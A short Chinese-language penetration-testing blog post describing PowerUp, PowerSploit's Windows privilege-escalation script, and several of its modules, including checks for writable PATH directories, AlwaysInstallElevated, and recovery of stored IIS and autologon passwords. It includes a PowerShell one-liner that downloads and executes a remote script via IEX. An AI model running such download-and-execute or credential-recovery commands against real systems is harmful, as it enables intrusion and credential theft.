PowUp渗透脚本基本模块

PowUp渗透脚本基本模块

PowUp脚本也位于PowerSploit下Privesc模块下

通常,在 Windows 下面我们可以通过内核漏洞来提升权限,但是,我们常常会碰到所处服务器通过内核漏洞提权是行不通的,这个时候,我们就需要通过脆弱的 Windows 服务提权;或者通过常见的系统服务,通过其继承的系统权限来完成提权等等,此框架可以在内核提权行不通的时候,帮助我们寻找服务器脆弱点进而通过脆弱点实现提权的目的。

PS C:\Users\Administrator> IEX (New-Object Net.WebClient).DownloadString("http://192.168.190.141/PowerSploit/Priv
erUp.ps1")

1.Invoke-AllChecks

该模块会自动执行PowerUp下所有模块来检查目的主机:

PowUp渗透脚本基本模块_第1张图片

 

2.Find-PathDLLHijack

该模块用于检查当前%PATH%的哪些目录是用户可以写入的:

 

PowUp渗透脚本基本模块_第2张图片

 

3.Get-ServiceDetail

该模块用于返回某服务的信息:

PowUp渗透脚本基本模块_第3张图片

 

 

4.Get-ApplicationHost

该模块可以利用系统上的applicationHost.config文件恢复加密过的应用池和虚拟目录的密码

PS C:\Users\Administrator> Get-ApplicationHost | Format-Table -AutoSize

 

 

5.Get-RegistryAlwaysInstallElevated

PS C:\Users\Administrator> Get-RegistryAlwaysInstallElevated

 

 该模块用于检查AlwaysInstallElevated注册表是否被设置,如果已经被设置,意味着MSI文件是以SYSTEM权限运行的。

 

 `AlwaysInstallElevated`是微软允许非授权用户以`SYSTEM`权限运行安装文件(`MSI`)的一种设置。

 

 

 

6.Get-RegistryAlwaysInstallElevated

 检测windows注册表的autoadminlogon项有没有被设置,可查询默认的用户名和密码。

PS C:\Users\Administrator> Get-RegistryAutoLogon

 

 

 

posted @ 2019-03-17 10:09 卿先生 阅读(...) 评论(...) 编辑 收藏

你可能感兴趣的:(Web渗透,权限提升,内网渗透)